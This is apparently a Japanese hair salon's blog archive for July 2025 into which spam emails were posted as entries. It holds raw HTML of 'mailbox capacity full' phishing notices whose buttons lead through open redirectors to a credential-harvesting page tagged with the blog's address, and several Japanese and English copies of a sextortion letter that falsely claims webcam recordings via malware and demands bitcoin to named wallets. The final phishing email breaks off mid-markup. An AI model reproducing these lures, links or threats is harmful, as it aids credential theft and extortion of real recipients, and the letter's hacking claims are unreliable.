カテゴリ
月別 アーカイブ
- 2025年7月 (8)
- 2025年6月 (4)
- 2025年5月 (1)
- 2023年5月 (30)
- 2023年2月 (3)
- 2023年1月 (12)
- 2022年12月 (15)
- 2022年10月 (15)
- 2022年9月 (15)
- 2022年8月 (15)
- 2022年7月 (15)
- 2022年6月 (15)
- 2022年5月 (18)
- 2022年3月 (15)
- 2022年2月 (15)
- 2022年1月 (15)
- 2021年12月 (16)
- 2021年11月 (14)
- 2021年10月 (15)
- 2021年9月 (16)
- 2021年8月 (17)
- 2021年7月 (15)
- 2021年6月 (15)
- 2021年5月 (5)
- 2021年3月 (3)
- 2021年2月 (5)
- 2021年1月 (5)
- 2020年12月 (4)
- 2020年11月 (8)
- 2020年10月 (7)
- 2020年9月 (6)
- 2020年8月 (7)
- 2020年7月 (5)
- 2020年6月 (3)
- 2020年5月 (6)
- 2020年4月 (5)
- 2020年3月 (5)
- 2020年2月 (7)
- 2020年1月 (4)
- 2019年12月 (7)
- 2019年11月 (3)
- 2019年10月 (8)
- 2019年9月 (9)
- 2019年8月 (11)
- 2019年7月 (11)
- 2019年6月 (10)
- 2019年5月 (5)
- 2019年4月 (4)
- 2019年3月 (5)
- 2019年2月 (5)
- 2019年1月 (3)
- 2018年12月 (4)
- 2018年11月 (5)
- 2018年10月 (5)
- 2018年9月 (6)
- 2018年8月 (4)
- 2018年7月 (8)
- 2018年6月 (6)
- 2018年5月 (10)
- 2018年4月 (4)
- 2018年3月 (3)
- 2018年2月 (5)
- 2018年1月 (3)
- 2017年12月 (10)
- 2017年11月 (7)
- 2017年10月 (13)
- 2017年9月 (11)
- 2017年8月 (12)
- 2017年7月 (14)
- 2017年6月 (14)
- 2017年5月 (6)
- 2017年4月 (3)
- 2017年3月 (7)
- 2017年2月 (8)
- 2017年1月 (12)
- 2016年12月 (12)
- 2016年11月 (15)
- 2016年10月 (11)
- 2016年9月 (8)
- 2016年8月 (11)
- 2016年7月 (13)
- 2016年6月 (13)
- 2016年5月 (10)
- 2016年4月 (10)
- 2016年3月 (14)
- 2016年2月 (9)
- 2016年1月 (11)
- 2015年12月 (16)
- 2015年11月 (34)
- 2015年10月 (38)
- 2015年9月 (27)
- 2015年8月 (18)
- 2015年7月 (22)
- 2015年6月 (32)
- 2015年5月 (20)
- 2015年4月 (1)
- 2014年7月 (1)
最近のエントリー
HOME > 栄本店ブログ > アーカイブ > 2025年7月
栄本店ブログ 2025年7月
【至急対応】メールボックスの容量が上限に達しました – メール
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>通知センター - 新しいお知らせ</title>
<style>
body {
margin: 0;
padding: 0;
background-color: #f2f1ed;
font-family: "Noto Sans JP", "Hiragino Kaku Gothic ProN", sans-serif;
color: #2e2e2e;
}
.zen-container {
max-width: 720px;
margin: 60px auto;
background: #fff;
border-radius: 20px;
padding: 40px;
box-shadow: 12px 12px 24px #d4d4d4, -12px -12px 24px #ffffff;
position: relative;
}
.zen-header {
text-align: center;
margin-bottom: 40px;
}
.zen-header h1 {
font-size: 26px;
font-family: 'Sawarabi Mincho', serif;
letter-spacing: 1px;
position: relative;
}
.zen-header h1::after {
content: '';
width: 60px;
height: 4px;
background-color: #b7282e;
display: block;
margin: 12px auto 0;
border-radius: 2px;
}
.zen-section {
margin-bottom: 36px;
}
.zen-section h2 {
font-size: 18px;
margin-bottom: 12px;
color: #b7282e;
font-family: 'Sawarabi Mincho', serif;
border-left: 6px solid #b7282e;
padding-left: 10px;
}
.zen-section p {
font-size: 15px;
line-height: 1.8;
}
.zen-section a {
color: #00467f;
text-decoration: none;
font-weight: bold;
transition: color 0.3s ease;
}
.zen-section a:hover {
color: #b7282e;
}
.zen-buttons {
display: flex;
justify-content: center;
gap: 20px;
margin-top: 30px;
}
.zen-buttons a {
text-decoration: none;
padding: 14px 24px;
border-radius: 8px;
font-weight: bold;
background: linear-gradient(145deg, #e0dfdb, #fff);
box-shadow: 4px 4px 10px #d1d1d1, -4px -4px 10px #fff;
transition: all 0.25s ease;
color: #2e2e2e;
}
.zen-buttons a:hover {
transform: translateY(-2px);
box-shadow: 0 6px 16px rgba(0, 0, 0, 0.1);
background: #f5f4f2;
}
.zen-footer {
margin-top: 50px;
text-align: center;
font-size: 13px;
color: #888;
}
.zen-footer a {
color: #0066aa;
text-decoration: none;
}
.zen-footer img {
width: 100px;
margin-top: 18px;
opacity: 0.7;
}
</style>
</head>
<body>
<div class="zen-container">
<div class="zen-header">
<h1>通知センター</h1>
</div>
<div class="zen-section">
<h2>未読メッセージのお知らせ</h2>
<p>あなたのメールボックスに <strong>7通の未読メッセージ</strong> が届いています。大切な内容が含まれている可能性がありますので、できるだけ早くご確認ください。</p>
<p><a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">→ メッセージを確認する</a></p>
</div>
<div class="zen-section">
<h2>配信エラーのご案内</h2>
<p>一部の送信メールがサーバーエラーにより配信されませんでした。詳細は以下のレポートをご覧ください。</p>
<p><a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">→ 配信レポートを見る</a></p>
</div>
<div class="zen-buttons">
<a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">今すぐ確認</a>
<a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">レポートをDL</a>
</div>
<div class="zen-footer">
<p>その他ご不明点は、<a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">サポートセンター</a>までお問い合わせください。</p>
<img src="https://example.com/logo.png" alt="ロゴ">
</div>
</div>
</body>
</html>
(SalonEF)
2025年7月31日 10:00
【至急対応】メールボックスの容量が上限に達しました – メール
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>通知センター - 新しいお知らせ</title>
<style>
body {
margin: 0;
padding: 0;
background-color: #f2f1ed;
font-family: "Noto Sans JP", "Hiragino Kaku Gothic ProN", sans-serif;
color: #2e2e2e;
}
.zen-container {
max-width: 720px;
margin: 60px auto;
background: #fff;
border-radius: 20px;
padding: 40px;
box-shadow: 12px 12px 24px #d4d4d4, -12px -12px 24px #ffffff;
position: relative;
}
.zen-header {
text-align: center;
margin-bottom: 40px;
}
.zen-header h1 {
font-size: 26px;
font-family: 'Sawarabi Mincho', serif;
letter-spacing: 1px;
position: relative;
}
.zen-header h1::after {
content: '';
width: 60px;
height: 4px;
background-color: #b7282e;
display: block;
margin: 12px auto 0;
border-radius: 2px;
}
.zen-section {
margin-bottom: 36px;
}
.zen-section h2 {
font-size: 18px;
margin-bottom: 12px;
color: #b7282e;
font-family: 'Sawarabi Mincho', serif;
border-left: 6px solid #b7282e;
padding-left: 10px;
}
.zen-section p {
font-size: 15px;
line-height: 1.8;
}
.zen-section a {
color: #00467f;
text-decoration: none;
font-weight: bold;
transition: color 0.3s ease;
}
.zen-section a:hover {
color: #b7282e;
}
.zen-buttons {
display: flex;
justify-content: center;
gap: 20px;
margin-top: 30px;
}
.zen-buttons a {
text-decoration: none;
padding: 14px 24px;
border-radius: 8px;
font-weight: bold;
background: linear-gradient(145deg, #e0dfdb, #fff);
box-shadow: 4px 4px 10px #d1d1d1, -4px -4px 10px #fff;
transition: all 0.25s ease;
color: #2e2e2e;
}
.zen-buttons a:hover {
transform: translateY(-2px);
box-shadow: 0 6px 16px rgba(0, 0, 0, 0.1);
background: #f5f4f2;
}
.zen-footer {
margin-top: 50px;
text-align: center;
font-size: 13px;
color: #888;
}
.zen-footer a {
color: #0066aa;
text-decoration: none;
}
.zen-footer img {
width: 100px;
margin-top: 18px;
opacity: 0.7;
}
</style>
</head>
<body>
<div class="zen-container">
<div class="zen-header">
<h1>通知センター</h1>
</div>
<div class="zen-section">
<h2>未読メッセージのお知らせ</h2>
<p>あなたのメールボックスに <strong>7通の未読メッセージ</strong> が届いています。大切な内容が含まれている可能性がありますので、できるだけ早くご確認ください。</p>
<p><a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">→ メッセージを確認する</a></p>
</div>
<div class="zen-section">
<h2>配信エラーのご案内</h2>
<p>一部の送信メールがサーバーエラーにより配信されませんでした。詳細は以下のレポートをご覧ください。</p>
<p><a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">→ 配信レポートを見る</a></p>
</div>
<div class="zen-buttons">
<a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">今すぐ確認</a>
<a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">レポートをDL</a>
</div>
<div class="zen-footer">
<p>その他ご不明点は、<a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">サポートセンター</a>までお問い合わせください。</p>
<img src="https://example.com/logo.png" alt="ロゴ">
</div>
</div>
</body>
</html>
(SalonEF)
2025年7月25日 11:00
協力オファー
御機嫌よう!
ご覧の通り、これは形式張ったメールではありませんが、残念ながら何かあなたへの朗報だとも限りません。しかし、そんなことは重要ではないので落胆しないでくださいね。今から全てをご説明いたします。
私は、あなたが頻繁に利用されているローカルネットワークの一部となる電子デバイスにアクセスしました。あなたのアクティビティを過去数ヶ月間追跡しております。
どうしてこうなったのか?と言うことですが、
エクスプロイトによってハッキングされたウェブサイトへあなたが訪問した為、あなたのデバイスが、私のマルウェアに晒されたのがきっかけです。(マルウェアは、この分野の専門家からダークネットで購入しました。)
これはとても複雑なソフトウェアで、トロイの木馬のように機能します。頻繁に更新される為、あなたのウィルス対策では検出できません。
このプログラムにはキーロガーが備わっていて、あなたのカメラやマイクのON/OFFを切り替えたり、ファイルを送信したり、あなたのローカルネットワークへのアクセスの提供を可能にします。
他のデバイスからの情報へアクセスするには少し時間を要しましたが、今のところ、私はあなたの全ての連絡先と会話内容、あなたの居場所についての情報、あなたが好きなもの、あなたのお気に入りのWebサイト等を把握しています。
正直な話、最初は何も悪気はなく、ただ楽しむために行っていました。これは私の趣味なのです。
しかしCOVIDに感染してしまい、残念ながら職を失いました。
そして、「自分の趣味」を使ってあなたからお金を頂戴する方法を考えついたのです!
あなたが自慰行為している動画を録画しました。この動画は二画面になっていて、あなたの顔は簡単に認識できますし、どのようなビデオを好むのかがハッキリと明らかになるようになっています。
私はこの行為を誇らしくは思っていないのですが、生き延びるためにはお金が必要なのです。
では、取引をしましょう。私が求める金額をあなたが私に支払えば、この動画があなたの友達、家族や他の知人に送信されることは一切ありません。
これは冗談ではないことは理解してくださいね。私はEメールで送信することもできますし、SMSのリンク、ソーシャルメディアを通して送信することも、マスメディアに投稿することもできるのです。(実はマスメディアの管理ページもハッキングしたんですよ。)
だから、あなたはTwitterや米国メディアInstagramの「スター」になれるでしょう!
これを避けたければ、私のBTCウォレットに1,490 USD相当のビットコインを送金してください: 1GXeQobAourhyeu4dvR1e55VFoFacU9gsF
ビットコインの使い方が分からなければ、BingやGoogleで<ビットコインの購入方法>等と検索すれば分かるはずです。
お金を受け取るとすぐに動画を削除します。その上、あなたのデバイスに感染したマルウェアも削除し、私から連絡を取ることは2度とありません。
2日間を猶予としますが、それだけあれば十分なはずです。このメールを開くとすぐに時間追跡が始まります。私は状況を監視していますよ!
そして最後に、
私はTORを使用しているので、ビットコイン取引を追跡することは不可能なため、この事を警察に連絡しても意味はありません。
私に返信もしないでください。(このレターはあなたのアカウント内で作成し、この件に全く関係のない人物の本物のアドレスを添えています。)なので、私を追跡することは不可能です。
何か馬鹿げた事をしたり、私の期待に反するような事をしたりすれば、すぐにこの動画をシェアします。
幸運を祈ります!
(SalonEF)
2025年7月11日 23:00
協力オファー
御機嫌よう!
ご覧の通り、これは形式張ったメールではありませんが、残念ながら何かあなたへの朗報だとも限りません。しかし、そんなことは重要ではないので落胆しないでくださいね。今から全てをご説明いたします。
私は、あなたが頻繁に利用されているローカルネットワークの一部となる電子デバイスにアクセスしました。あなたのアクティビティを過去数ヶ月間追跡しております。
どうしてこうなったのか?と言うことですが、
エクスプロイトによってハッキングされたウェブサイトへあなたが訪問した為、あなたのデバイスが、私のマルウェアに晒されたのがきっかけです。(マルウェアは、この分野の専門家からダークネットで購入しました。)
これはとても複雑なソフトウェアで、トロイの木馬のように機能します。頻繁に更新される為、あなたのウィルス対策では検出できません。
このプログラムにはキーロガーが備わっていて、あなたのカメラやマイクのON/OFFを切り替えたり、ファイルを送信したり、あなたのローカルネットワークへのアクセスの提供を可能にします。
他のデバイスからの情報へアクセスするには少し時間を要しましたが、今のところ、私はあなたの全ての連絡先と会話内容、あなたの居場所についての情報、あなたが好きなもの、あなたのお気に入りのWebサイト等を把握しています。
正直な話、最初は何も悪気はなく、ただ楽しむために行っていました。これは私の趣味なのです。
しかしCOVIDに感染してしまい、残念ながら職を失いました。
そして、「自分の趣味」を使ってあなたからお金を頂戴する方法を考えついたのです!
あなたが自慰行為している動画を録画しました。この動画は二画面になっていて、あなたの顔は簡単に認識できますし、どのようなビデオを好むのかがハッキリと明らかになるようになっています。
私はこの行為を誇らしくは思っていないのですが、生き延びるためにはお金が必要なのです。
では、取引をしましょう。私が求める金額をあなたが私に支払えば、この動画があなたの友達、家族や他の知人に送信されることは一切ありません。
これは冗談ではないことは理解してくださいね。私はEメールで送信することもできますし、SMSのリンク、ソーシャルメディアを通して送信することも、マスメディアに投稿することもできるのです。(実はマスメディアの管理ページもハッキングしたんですよ。)
だから、あなたはTwitterや米国メディアInstagramの「スター」になれるでしょう!
これを避けたければ、私のBTCウォレットに1,490 USD相当のビットコインを送金してください: 12q8g44gHiWJz4xcdQKZxtziT4McojxwSF
ビットコインの使い方が分からなければ、BingやGoogleで<ビットコインの購入方法>等と検索すれば分かるはずです。
お金を受け取るとすぐに動画を削除します。その上、あなたのデバイスに感染したマルウェアも削除し、私から連絡を取ることは2度とありません。
2日間を猶予としますが、それだけあれば十分なはずです。このメールを開くとすぐに時間追跡が始まります。私は状況を監視していますよ!
そして最後に、
私はTORを使用しているので、ビットコイン取引を追跡することは不可能なため、この事を警察に連絡しても意味はありません。
私に返信もしないでください。(このレターはあなたのアカウント内で作成し、この件に全く関係のない人物の本物のアドレスを添えています。)なので、私を追跡することは不可能です。
何か馬鹿げた事をしたり、私の期待に反するような事をしたりすれば、すぐにこの動画をシェアします。
幸運を祈ります!
(SalonEF)
2025年7月11日 01:00
Cooperation Offer.
Hello!<br>
As you can see, this is not a formal email, and unfortunately, it does not mean anything good for you. <br>
BUT do not despair, it is not critical. I am going to explain to you everything right now. <br>
<br>
I have access to your electronic devices, which are the part of the local network you regularly use. <br>
I have been tracking your activity for the last few months. <br>
<br>
How did that happen?<br>
You visited some hacked websites with Exploit, and your device was exposed to my malicious software (I bought it in Darknet from specialists in this field).<br>
This is a very complex software, operating as Trojan Horse. It updates regularly, and your antivirus can not detect it. <br>
The program has a keylogger; it can turn your camera and microphone on and off, send files and provide access to your local network. <br>
<br>
It took me some time to get access to the information from other devices, and as of now, I have all your contacts with conversations, info about your locations, what you like, your favourite websites, etc. <br>
Honestly, I meant nothing bad at first and did that just for fun. This is my hobby. <br>
<br>
When I hacked into your mail_account, your password was: <br>
<br>
But I got COVID and unfortunately lost my job. <br>
And I figured out how to use "my hobby" to get money from you! <br>
I recorded a video of you masturbating. This video has a separated screen, where you can be easily recognised; also, it can be clearly seen what sort of video you prefer. <br>
Well, I am not proud of this, but I need money to survive. <br>
<br>
Let's make a deal. You pay me as much as I ask you to, and I won't send this video to your friends, family, and other acquaintances. <br>
You should understand, this is not a joke. I can send it by email, through SMS-link, social media, even post it in mass media (I have got some hacked accounts of their admins).<br>
So you can become Twitter or Instagram "Star"! <br>
<br>
To avoid this, you should send me 1,290 USD in Bitcoins on my BTC wallet:1MK7VnGrPM8T8Z7jm3b4V6FDinSNHbUAyt<br>
<br>
If you don't know how to use Bitcoins, search it in Bing or Google <<how can I purchase Bitcoins>> or other stuff like that. <br>
I will delete the video as soon as I receive the money. I will also delete the malicious software from your device, and you will never hear from me again. <br>
I'll give you 2 days, that's more than enough, I think. Time tracking will start as soon as you open this email, I am monitoring this! <br>
<br>
And one last thing:<br>
It makes no sense to report about this to the police since I am using TOR, so there is no way to track Bitcoin transactions. <br>
Don't respond to me (I generated this letter in your account and put the real address of the man who has no idea about this). In such a way, I make it impossible to track me.<br>
<br>
If you ever do something stupid or against my expectations, I will immediately share this video. <br>
Good luck!<br>
(SalonEF)
2025年7月11日 01:00
【重要】メールボックス容量が上限に達しました – 対応が必要で
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>メールボックス通知</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f9f9f9;
text-align: center;
margin: 0;
padding: 0;
}
.container {
max-width: 600px;
background: #ffffff;
margin: 50px auto;
padding: 25px;
border-radius: 10px;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
}
.icon {
font-size: 50px;
color: #d9534f;
margin-bottom: 20px;
}
.btn {
font-size: 14px;
color: #ffffff;
background-color: #0275d8;
padding: 10px 25px;
border: none;
border-radius: 5px;
text-decoration: none;
display: inline-block;
font-weight: bold;
margin-top: 15px;
}
.btn:hover {
background-color: #025aa5;
}
.footer {
font-size: 12px;
color: #777;
margin-top: 20px;
padding-top: 15px;
border-top: 1px solid #ddd;
}
</style>
</head>
<body>
<div class="container">
<div class="icon">
(SalonEF)
2025年7月 3日 12:00
【重要】メールボックス容量が上限に達しました – 対応が必要で
<div class=""><div class="aHl"></div><div id=":mr" tabindex="-1"></div><div id=":mh" class="ii gt" jslog="20277; u014N:xr6bB; 1:WyIjdGhyZWFkLWY6MTgwMzkxMDU3MDY4MDA5Mzg4OCJd; 4:WyIjbXNnLWY6MTgwMzkxMDU3MDY4MDA5Mzg4OCJd"><div id=":mg" class="a3s aiL msg-3561815401774486714"><div class="adM">
</div><div dir="ltr"><div class="adM">
</div><div style="font-family:Aptos,Aptos_EmbeddedFont,Aptos_MSFontService,Calibri,Helvetica,sans-serif;font-size:12pt;color:rgb(0,0,0)" class="adM">
<br>
</div><div class="adM">
</div><div id="m_-3561815401774486714divRplyFwdMs
g" dir="ltr" class="adM">
<div> </div>
</div><div class="adM">
</div><div style="background-color:rgb(255,255,255)"><div class="adM">
</div><div style="margin:0px auto" align="center"><div class="adM">
</div><table style="direction:ltr;border-width:1px;border-style:solid;border-color:rgb(225,223,221);border-radius:4px 4px 0px 0px;background-color:rgb(255,255,255);margin:0px auto;width:100%;max-width:640px;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr;padding-right:24px;padding-left:24px;height:72px">
<table style="direction:ltr;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="" data-image-whitelisted="" class="CToWUd" data-bit="iit"></span></td>
<td style="direction:ltr;padding-right:6px;padding-left:6px">
<div style="direction:ltr;font-family:"Segoe UI",sans-serif;font-size:20px;color:rgb(50,49,48)">
<span style="line-height:28px;font-weight:600"><a href="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp" style="color:rgb(50,49,48);text-decoration:none" id="m_-3561815401774486714OWA48a9bde5-1cd0-eb30-3be9-cb58002b8693" target="_blank" data-saferedirecturl="https://www.google.com/url?q=http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jpfyeye.com/en-US/Home/PlanViews/kXWpPIikN0WCJ2TyCzpqcWUAC9Ek?Type%3DAssignedTo%26Channel%3DOdspNotify%26CreatedTime%3D638556294226474423&source=gmail&ust=1720429649932000&usg=AOvVaw0ez1T0aO2ExNe976lNG_0i">通知</a></span></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="direction:ltr;border-right:1px solid rgb(225,223,221);border-left:1px solid rgb(225,223,221);background-color:rgb(248,248,248);margin:0px auto;width:100%;max-width:640px;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr;padding:24px 24px 16px">
<table style="direction:ltr;width:100%;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr">
<table style="direction:ltr;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="" data-image-whitelisted="" class="CToWUd" data-bit="iit"></span></td>
<td style="direction:ltr;padding-right:8px;padding-left:8px">
<div style="direction:ltr;font-family:"Segoe UI",sans-serif;font-size:14px;color:rgb(50,49,48)">
<span style="font-weight:700">salon-ef.jp</span> 未読メール</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style="direction:ltr;padding-top:24px">
<table style="direction:ltr;border-width:1px;border-style:solid;border-color:rgb(225,223,221);border-radius:4px;background-color:rgb(255,255,255);width:100%;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr;padding:24px">
<table style="direction:ltr;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr">
<div style="direction:ltr;font-family:"Segoe UI",sans-serif;font-size:14px;color:rgb(50,49,48)">
<span style="line-height:20px;font-weight:600"><u><a href="https://documentos.arq.com.mx/cgi-bin/docimg.cgi?a=ir&did=66431&url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp" style="color:rgb(50,49,48)" id="m_-3561815401774486714OWAf2e82de2-4753-4022-d906-12c52cdb2fcc" target="_blank" data-saferedirecturl="http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp">7 受信メッセージ </a></u></span></div>
</td>
</tr>
<tr>
<td style="direction:ltr">
<table style="direction:ltr;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="" data-image-whitelisted="" class="CToWUd" data-bit="iit"></span></td>
<td style="direction:ltr;padding-right:3px;padding-left:3px">
<div style="direction:ltr;font-family:"Segoe UI",sans-serif;font-size:12px;color:rgb(96,94,92)">
<span style="line-height:16px">July 2, 2025 at 04:57:19 PM</span></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="direction:ltr;border-right:1px solid rgb(225,223,221);border-left:1px solid rgb(225,223,221);background-color:rgb(248,248,248);margin:0px auto;width:100%;max-width:640px;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr;padding:8px 24px 24px">
<table style="direction:ltr;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr">
<table style="direction:ltr;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr;border-width:1px;border-style:solid;border-color:rgb(225,223,221);border-radius:2px;background-color:rgb(16,124,65);padding:6px 20px" align="center">
<div style="direction:ltr;font-family:"Segoe UI",sans-serif;font-size:14px;color:rgb(255,255,255)">
<span style="line-height:20px;font-weight:600"><a href="https://documentos.arq.com.mx/cgi-bin/docimg.cgi?a=ir&did=66431&url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp" target="_blank" data-saferedirecturl="https://www.google.com/url?q=https://teams.microsoft.com/l/entity/com.microsoft.teamspace.tab.planner/mytasks?tenantId%3D9d77b7fc-94cf-439a-9464-58c1813e0db4%26webUrl%3Dhttps%253a%252f%252ftasks.teams.microsoft.com%252fteamsui%252fpersonalApp%252falltasklists%26context%3D%257b%2522subEntityId%2522%253a%2522%252fv1%252fplan%252fkXWpPIikN0WCJ2TyCzpqcWUAC9Ek%252ftask%252f7u6d6YJm9Emh03ARApFp9GUAPE6K%253fnc%253demail%2526nt%253dtaskassigned%2522%257d&source=gmail&ust=1720429649932000&usg=AOvVaw0wnMtutcZco6hivQUvUN11">Open
in Browser</a></span></div>
</td>
</tr>
</tbody>
</table>
</td>
<td style="direction:ltr;padding-right:10px;padding-left:10px">
<table style="direction:ltr;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr;border-width:1px;border-style:solid;border-color:rgb(225,223,221);border-radius:2px;background-color:rgb(255,255,255);padding:6px 20px" align="center">
<div style="direction:ltr;font-family:"Segoe UI",sans-serif;font-size:14px;color:rgb(37,36,36)">
<span style="line-height:20px;font-weight:600"><a href="https://documentos.arq.com.mx/cgi-bin/docimg.cgi?a=ir&did=66431&url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp" target="_blank" data-saferedirecturl="https://www.google.com/url?q=http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jpfyeye.com/Home/PlanViews/kXWpPIikN0WCJ2TyCzpqcWUAC9Ek/7u6d6YJm9Emh03ARApFp9GUAPE6K?Type%3DAssignedTo%26Channel%3DOdspNotify%26CreatedTime%3D638556294227880791&source=gmail&ust=1720429649932000&usg=AOvVaw0Z9DnBqHr4U1eBNlOj0Yan">Download Message</a></span></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="direction:ltr;border-width:1px;border-style:solid;border-color:rgb(225,223,221);border-radius:0px 0px 4px 4px;background-color:rgb(255,255,255);margin:0px auto;width:100%;max-width:640px;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr">
<table style="direction:ltr;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr;padding-top:20px;vertical-align:top">
<table style="direction:ltr;width:100%;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
<td style="direction:ltr;line-height:20px;padding-top:6px;padding-right:32px;padding-left:32px;color:rgb(107,107,107)">
<div style="direction:ltr;line-height:20px;font-family:"Segoe UI",SUWR,Verdana,sans-serif;font-size:10px">
<span style="letter-spacing:-0.01em">サーバー エラーにより、メールボックスから送信された 7 通の電子メールが受信者に配信されなかったという通知を受け取りました.</span></div>
</td>
</tr>
<tr>
<td style="direction:ltr;line-height:20px;padding-top:6px;padding-right:32px;padding-left:32px;color:rgb(107,107,107)">
<div style="direction:ltr;line-height:20px;font-family:"Segoe UI",SUWR,Verdana,sans-serif;font-size:10px">
<span style="letter-spacing:-0.01em">添付された電子メール レポートを確認し、適切な措置を講じてください。
</span><span style="letter-spacing:-0.01em;color:rgb(107,107,108)"><u><a href="https://documentos.arq.com.mx/cgi-bin/docimg.cgi?a=ir&did=66431&url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp" style="color:rgb(107,107,108)" id="m_-3561815401774486714OWA9e42fc43-33fa-e217-5a54-9982f683f6c4" target="_blank" data-saferedirecturl="https://www.google.com/url?q=http://archivo.lavoz.com.ar/frame.asp?url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp&source=gmail&ust=1720429649932000&usg=AOvVaw2GBK_Y4yYNeMlUrrhSC0tB"></a></u></span><span style="letter-spacing:-0.01em">,
添付されたメールをお読みください.</span></div>
</td>
</tr>
<tr>
<td style="direction:ltr;line-height:20px;padding-top:6px;padding-right:32px;padding-left:32px;color:rgb(107,107,107)">
<div style="direction:ltr;line-height:20px;font-family:"Segoe UI",SUWR,Verdana,sans-serif;font-size:10px;color:rgb(107,107,108)">
<span style="letter-spacing:-0.01em"><u><a href="https://documentos.arq.com.mx/cgi-bin/docimg.cgi?a=ir&did=66431&url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp" style="color:rgb(107,107,108)" id="m_-3561815401774486714OWA25604c0d-417b-0848-82dc-09fa14974600" target="_blank" data-saferedirecturl="https://www.google.com/url?q=http://go.microsoft.com/fwlink/?LinkId%3D521839&source=gmail&ust=1720429649932000&usg=AOvVaw37RJUWHY4nXfP8P6hP5wb8"></a></u></span></div>
</td>
</tr>
<tr>
<td style="direction:ltr;line-height:20px;padding-top:6px;padding-right:32px;padding-left:32px;color:rgb(107,107,107)">
<div style="direction:ltr;line-height:20px;font-family:"Segoe UI",SUWR,Verdana,sans-serif;font-size:10px">
<span style="letter-spacing:-0.01em"></span></div>
</td>
</tr>
<tr>
<td style="direction:ltr;padding:10px 32px 24px">
<table style="direction:ltr;border-collapse:collapse;border-spacing:0px;box-sizing:border-box">
<tbody>
<tr>
